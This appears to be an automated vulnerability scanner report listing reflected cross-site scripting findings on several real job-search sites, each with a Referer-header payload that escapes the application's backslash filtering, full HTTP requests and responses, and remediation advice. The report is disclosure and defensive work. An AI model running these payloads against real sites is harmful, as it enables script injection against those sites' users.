HTTP/1.1 200 OK Cache-Control: private Content-Length: 18260 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=f9e52af2e97f4108862ebb1d40020c0a-343075015-x4-6; domain=.careerpath.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65012B0EBFDEAC002E3672E13135216764380C6C90F6C3DF0B43D9CF819A7181C7E74EBD8C892CA8D51; domain=.careerpath.com; expires=Mon, 14-Nov-2011 23:36:54 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR40 Date: Sun, 14 Nov 2010 23:36:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Free C ...[SNIP]... areerPath'; s_cb.prop1='Home'; s_cb.eVar8='CareerPath - Home'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 97b5f\\';alert(1)//1e14e191674'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 685bd\'%3balert(1)//16496604f53 was submitted in the Referer HTTP header. This input was echoed as 685bd\\';alert(1)//16496604f53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /career-tests/ HTTP/1.1 Host: www.careerpath.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=685bd\'%3balert(1)//16496604f53
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 28243 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=a3e79f1fb6c241bcb9f7b33a83956998-343074996-w7-6; domain=.careerpath.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650632295AC1CDD9553705F657A5E776EFB4CCE3F73D20D657AFBDC025A611F159C07D954FF849B5ECA; domain=.careerpath.com; expires=Mon, 14-Nov-2011 23:36:36 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR7 Date: Sun, 14 Nov 2010 23:36:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Career ...[SNIP]... eerPath'; s_cb.prop1='Tests'; s_cb.eVar8='CareerPath - Tests'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 685bd\\';alert(1)//16496604f53'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fa0c\'%3balert(1)//7507414807 was submitted in the Referer HTTP header. This input was echoed as 2fa0c\\';alert(1)//7507414807 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1 Host: www.careerrookie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=2fa0c\'%3balert(1)//7507414807
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 44542 Content-Type: text/html; charset=UTF-8 Content-Language: en-GB Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=4c609ccd1d474ef9b01bf61eb76f6135-343075037-we-6; domain=.careerrookie.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650A27AB6E5244FB1D5CC22ED6B2C22B20F5B98F92063A0306345F8DEDB90748B7FDD57E4FBA08DC8C9; domain=.careerrookie.com; expires=Mon, 14-Nov-2011 23:37:16 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR15 Date: Sun, 14 Nov 2010 23:37:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-GB" lang="en-GB"> <head><title> Intern ...[SNIP]... s_cb.prop1='CC Home Page'; s_cb.eVar8='js_home - CC Home Page'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 2fa0c\\';alert(1)//7507414807'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af4ce\'%3balert(1)//5c6b07409fe was submitted in the Referer HTTP header. This input was echoed as af4ce\\';alert(1)//5c6b07409fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jobs/keyword/internships HTTP/1.1 Host: www.careerrookie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=af4ce\'%3balert(1)//5c6b07409fe
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 143722 Content-Type: text/html; charset=UTF-8 Content-Language: en-GB Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: internships:mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=b2f0404e31c84a70924239852a0ed64f-343075067-wo-6; domain=.careerrookie.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650476D6529DC6D183BBD989F6985B3B871623375EF8CB8EF4D1ACCFF5A355DA2AF993EF6531C1AD6A3; domain=.careerrookie.com; expires=Mon, 14-Nov-2011 23:37:46 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 23:52:47 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR25 Date: Sun, 14 Nov 2010 23:37:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-GB" lang="en-GB"> <head><title> Intern ...[SNIP]... ps'; s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14=', '; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - af4ce\\';alert(1)//5c6b07409fe'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f326\'%3balert(1)//5d70d6edb82 was submitted in the Referer HTTP header. This input was echoed as 2f326\\';alert(1)//5d70d6edb82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1 Host: www.cbsalary.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=2f326\'%3balert(1)//5d70d6edb82
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 30307 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=35d70c9bfcb343bea4e5a29f95709b7f-343075092-R4-4; domain=.cbsalary.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65062343E1361F7F3943ACDA2EFAE6ADDD4E6531AE6AB39B734E844DC72DE36B63C98B8A34FBE91CDF0; domain=.cbsalary.com; expires=Mon, 14-Nov-2011 23:38:12 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: REBEL4 Date: Sun, 14 Nov 2010 23:38:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Salary ...[SNIP]... l='CBSalary'; s_cb.prop1='Home'; s_cb.eVar8='CBSalary - Home'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 2f326\\';alert(1)//5d70d6edb82'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c892\'%3balert(1)//157cc6ae305 was submitted in the Referer HTTP header. This input was echoed as 2c892\\';alert(1)//157cc6ae305 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /?siteid=cbsubnav HTTP/1.1 Host: www.cbsalary.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=2c892\'%3balert(1)//157cc6ae305
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 30546 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=6b6a4b6151a7497a822f6e3b1bbd1ac9-343075068-VK-4; domain=.cbsalary.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650AC7EA04ECCDFCA938426DBD3F67F957851EFD2630916E8F623FBE2F8C1807DAB0579D0C74890C42E; domain=.cbsalary.com; expires=Mon, 14-Nov-2011 23:37:48 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: REBEL32 Date: Sun, 14 Nov 2010 23:37:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Salary ...[SNIP]... l='CBSalary'; s_cb.prop1='Home'; s_cb.eVar8='CBSalary - Home'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 2c892\\';alert(1)//157cc6ae305'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5cfb\'%3balert(1)//dbd7525218b was submitted in the Referer HTTP header. This input was echoed as a5cfb\\';alert(1)//dbd7525218b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /salary-calculator.aspx HTTP/1.1 Host: www.cbsalary.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=a5cfb\'%3balert(1)//dbd7525218b
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 41552 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=2f6a939c36a346b48e3f10f529177413-343075137-RD-4; domain=.cbsalary.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6502A9657836CC74821965A6585DA6C2FCFF1BC4BFFAC9AD1DFF38417B3023048F50980D7A080B26064; domain=.cbsalary.com; expires=Mon, 14-Nov-2011 23:38:57 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: REBEL13 Date: Sun, 14 Nov 2010 23:38:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
s_cb.prop1='Calc_Salary'; s_cb.eVar8='CBSalary - Calc_Salary'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - a5cfb\\';alert(1)//dbd7525218b'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c331\'%3balert(1)//ef3a7678535 was submitted in the Referer HTTP header. This input was echoed as 3c331\\';alert(1)//ef3a7678535 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /salary-calculator.aspx?siteid=jrptop?sc_cmp1=JS_JR_CBSalTop HTTP/1.1 Host: www.cbsalary.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=3c331\'%3balert(1)//ef3a7678535
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 41418 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=68c677c7d9f545e79c6a39372dccb761-343075211-R1-4; domain=.cbsalary.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6501ADA673217DAA8E9B52124FB919A886C53B2E01159BECFB68E584CF6955E5B399D728E5D89FF8BAF; domain=.cbsalary.com; expires=Mon, 14-Nov-2011 23:40:11 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: REBEL1 Date: Sun, 14 Nov 2010 23:40:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
s_cb.prop1='Calc_Salary'; s_cb.eVar8='CBSalary - Calc_Salary'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 3c331\\';alert(1)//ef3a7678535'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a58d4\'%3balert(1)//325548f38c3 was submitted in the Referer HTTP header. This input was echoed as a58d4\\';alert(1)//325548f38c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1 Host: www.kariera.gr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=a58d4\'%3balert(1)//325548f38c3
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 80791 Content-Type: text/html; charset=UTF-8 Content-Language: el Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=e4e4be6802f54411ab0038acc80753ae-343075119-w8-6; domain=.kariera.gr; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650DF19A751D8395CC1170EB74F4726489984AEFF398FD767D38AF33A5BE86D2B98C69A95601F97295A; domain=.kariera.gr; expires=Mon, 14-Nov-2011 23:38:38 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR8 Date: Sun, 14 Nov 2010 23:38:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="el" lang="el"> <head><title> ............ ...[SNIP]... s_cb.prop1='GR Home Page'; s_cb.eVar8='JS_Home - GR Home Page'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - a58d4\\';alert(1)//325548f38c3'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 628be\'%3balert(1)//55e5ad7603c was submitted in the Referer HTTP header. This input was echoed as 628be\\';alert(1)//55e5ad7603c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1 Host: www.miracleworkers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=628be\'%3balert(1)//55e5ad7603c
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 37818 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=360665844b694b2cb05589afd8c5f836-343075319-wc-6; domain=.miracleworkers.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65064B3BC978D637492429AB4E98AB0447326E8FEA6FF9D6F760ED984C0A689C9A3A65ADCD1DC5438BE; domain=.miracleworkers.com; expires=Mon, 14-Nov-2011 23:41:59 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR13 Date: Sun, 14 Nov 2010 23:41:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Health ...[SNIP]... workers.com'; s_cb.channel='js_home'; s_cb.eVar8='js_home - '; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 628be\\';alert(1)//55e5ad7603c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd607\'%3balert(1)//ab073727a3c was submitted in the Referer HTTP header. This input was echoed as bd607\\';alert(1)//ab073727a3c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
